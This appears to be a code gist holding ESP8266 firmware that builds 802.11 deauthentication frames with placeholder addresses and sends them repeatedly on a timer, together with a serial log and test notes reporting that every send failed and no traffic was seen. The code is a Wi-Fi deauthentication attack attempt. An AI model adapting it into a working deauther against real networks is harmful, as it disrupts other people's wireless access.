Created
November 2, 2015 17:56
rl��r��#�n����p�<�b�$�rrp�l�����p��n�`rn|��n�܀�r����~�n���l`��#�n��;nr���;��?��rp�n���pp��<����b�ľ~�n�����rnr���;��?�l��r��l`�don't use rtc mem data | |
r� | |
SDK version:1.4.0 | |
mode : sta(5c:cf:7f:01:5b:09) | |
add if0 | |
0 = wifi_register_send_pkt_freedom_cb() | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:10:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:20:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:30:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:40:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:50:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:60:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:70:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:80:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:90:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:A0:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:B0:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:C0:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:D0:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:E0:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:F0:00:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:01:01:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:11:01:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:21:01:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:31:01:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:41:01:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:51:01:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:61:01:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:71:01:07:00, 26, 0) | |
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:81:01:07:00, 26, 0) |
Hardware: Adafruit Huzzah, which uses the AI-Thinker ESP-12
Environment: Both the Espressif SDK and esp-open-sdk
Testing: tcpdump captures on Linux using a USB Wi-Fi card in monitor mode, and on OS X using the built-in Wi-Fi in monitor mode.
There was minimal Wi-Fi traffic during the tests, basically 1 AP and 2-3 clients on the channel.
Results: No traffic was seen from the ESP.
#include "ets_sys.h" | |
#include "osapi.h" | |
#include "gpio.h" | |
#include "os_type.h" | |
#include "mem.h" | |
#include "user_config.h" | |
#include "user_interface.h" | |
#include "driver/uart.h" | |
/* Priority and queue depth for a user task. The queue is declared here but
 * nothing else in this listing references it. */
#define user_procTaskPrio 0
#define user_procTaskQueueLen 1
os_event_t user_procTaskQueue[user_procTaskQueueLen];

/* Periodic timer that drives deauth(); it is armed in user_init(). */
static volatile os_timer_t deauth_timer;

/* Value written into the frame's sequence-control field; advanced by deauth(). */
uint16_t seq_n = 0;

/* Scratch buffer in which the frame is assembled before it goes to the SDK. */
uint8_t packet_buffer[64];

/*
 * Template for an IEEE 802.11 deauthentication frame (26 bytes).
 *
 * The address fields hold the ASCII strings "client" and "apoint", i.e.
 * placeholders rather than real MAC addresses.
 *
 * Deauthentication frames are not authenticated unless the network has
 * negotiated 802.11w Protected Management Frames, which is the standard
 * mitigation against forged ones.
 */
uint8_t deauth_packet[26] = {
    0xC0, 0x00,                         /* Frame control: management, subtype deauthentication */
    0x00, 0x00,                         /* Duration */
    0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, /* Address 1 (author: client MAC), ASCII "client" */
    0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, /* Address 2 (author: AP MAC), ASCII "apoint" */
    0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, /* Address 3 (author: AP MAC), ASCII "apoint" */
    0x00, 0x00,                         /* Sequence control, patched by write_packet() */
    0x07, 0x00                          /* Reason code 7, little-endian */
};

/* Number of bytes of deauth_packet handed to the SDK and printed in the log. */
uint16_t deauth_size = sizeof deauth_packet;
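/*
 * Print len bytes of buf, beginning at index start, as colon-separated
 * upper-case hex (e.g. "C0:00:07").
 *
 * buf   - buffer to dump; a NULL pointer prints nothing.
 * start - index of the first byte to print.
 * len   - number of bytes to print. The caller must guarantee that
 *         buf holds at least start + len bytes.
 *
 * The previous loop used len as the end index and keyed the separator on
 * i > 0, so any call with start > 0 printed too few bytes and a leading ':'.
 * Calls with start == 0 (the only use in this file) print exactly as before.
 */
void print_buffer(uint8_t *buf, uint16_t start, uint16_t len) {
    /* 32-bit arithmetic so start + len cannot wrap around 16 bits. */
    uint32_t end = (uint32_t)start + len;
    uint32_t i;

    if (buf == NULL) {
        return;
    }
    for (i = start; i < end; i++) {
        if (i > start) {
            os_printf(":");
        }
        os_printf("%02X", buf[i]);
    }
}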
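/*
 * Copy the deauth_packet template into buf and patch in the sequence-control
 * field.
 *
 * buf - destination; must have room for at least sizeof deauth_packet (26)
 *       bytes. No length is passed in, so the caller is responsible for the
 *       bound. A NULL pointer is ignored.
 * seq - 16-bit sequence-control value, stored little-endian in bytes 22-23.
 *
 * The earlier code split seq with "% 0xFF" and "/ 0xFF" (255, not 256), which
 * is not a byte split: 0x0100 came out as 01:01 in the serial log. Masking
 * and shifting gives the real low and high bytes.
 */
void write_packet(uint8_t *buf, uint16_t seq)
{
    uint16_t i;

    if (buf == NULL) {
        return;
    }

    /* Copy bound is tied to the template so the two cannot drift apart. */
    for (i = 0; i < sizeof deauth_packet; i++) {
        buf[i] = deauth_packet[i];
    }

    /* Author's note: an earlier experiment also overwrote bytes 0 and 1 with
     * the sequence value in the hope of seeing any output at all. No traffic
     * was observed, so that experiment stays disabled. */

    buf[22] = (uint8_t)(seq & 0xFF); /* low byte  */
    buf[23] = (uint8_t)(seq >> 8);   /* high byte */
}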
/*
 * Timer callback: build one frame in packet_buffer, hand it to
 * wifi_send_pkt_freedom() and log the call with its return value on the UART.
 *
 * In the author's tests wifi_send_pkt_freedom() always returned -1 (failure),
 * which matches the serial log captured alongside this file.
 */
void deauth()//void *arg)
{
    int send_result;

    /* The low four bits of sequence control are the fragment number, so
     * adding 0x10 advances the sequence number by one (see 802.11). */
    seq_n += 0x10;
    if (seq_n > 0x2fc) {
        /* Wrap threshold is 764 decimal, as chosen by the author.
         * NOTE(review): the reason for this particular limit is not shown. */
        seq_n = 0x00;
    }

    write_packet(packet_buffer, seq_n);

    /* Send first, then print, so the log line leads with the return code. */
    send_result = wifi_send_pkt_freedom(packet_buffer, deauth_size, 0);
    os_printf("%d = wifi_send_pkt_freedom(", send_result);
    print_buffer(packet_buffer, 0, deauth_size);
    os_printf(", %d, 0)\n", deauth_size);
}
/*
 * Completion callback registered with wifi_register_send_pkt_freedom_cb().
 *
 * The SDK documentation quoted by the author says the next packet may only be
 * sent after the previous one has been sent and this callback has been
 * entered. The author never saw it called.
 *
 * A variant carrying ICACHE_FLASH_ATTR was also tried and is left disabled.
 *
 * status - value passed in by the SDK; it is only logged here.
 */
void callback_send_pkt_freedom(uint8 status)
{
    /* No trailing newline: the tag and status run into the next log output. */
    os_printf_plus("[pkt-cb] %d", status);
}
/*
 * Runs once the SDK reports that system initialisation is complete: pins the
 * radio to channel 1 and registers the sent-packet callback, logging the
 * registration result on the UART.
 */
void ICACHE_FLASH_ATTR
callback_system_init_done(void)
{
    int register_result;

    /* Set channel */
    wifi_set_channel(1);

    /* Register the callback for sent packets. The author reports this has
     * always returned 0 (success). */
    register_result = wifi_register_send_pkt_freedom_cb(callback_send_pkt_freedom);
    os_printf("%d = wifi_register_send_pkt_freedom_cb()\n", register_result);
}
/*
 * Firmware entry point: brings up the UART at 115200 baud, prints the SDK
 * version, selects station mode, arms the repeating timer that calls
 * deauth(), and defers the radio setup to callback_system_init_done().
 */
void ICACHE_FLASH_ATTR
user_init()
{
    uart_init(115200, 115200);
    os_printf("\n\nSDK version:%s\n", system_get_sdk_version());

    wifi_set_opmode(STATION_MODE);

    /* Disarm before reconfiguring, then install the callback.
     * NOTE(review): deauth() is defined without parameters and is cast to
     * os_timer_func_t here; giving it the timer callback's argument list
     * would remove the cast. deauth_timer is also declared volatile, and
     * that qualifier is dropped when its address is passed to these calls. */
    os_timer_disarm(&deauth_timer);
    os_timer_setfn(&deauth_timer, (os_timer_func_t *) deauth, NULL);

    /* CHANNEL_HOP_INTERVAL is not defined in this file; presumably it comes
     * from user_config.h. The final argument 1 makes the timer repeat. */
    os_timer_arm(&deauth_timer, CHANNEL_HOP_INTERVAL, 1);

    system_init_done_cb(callback_system_init_done);
}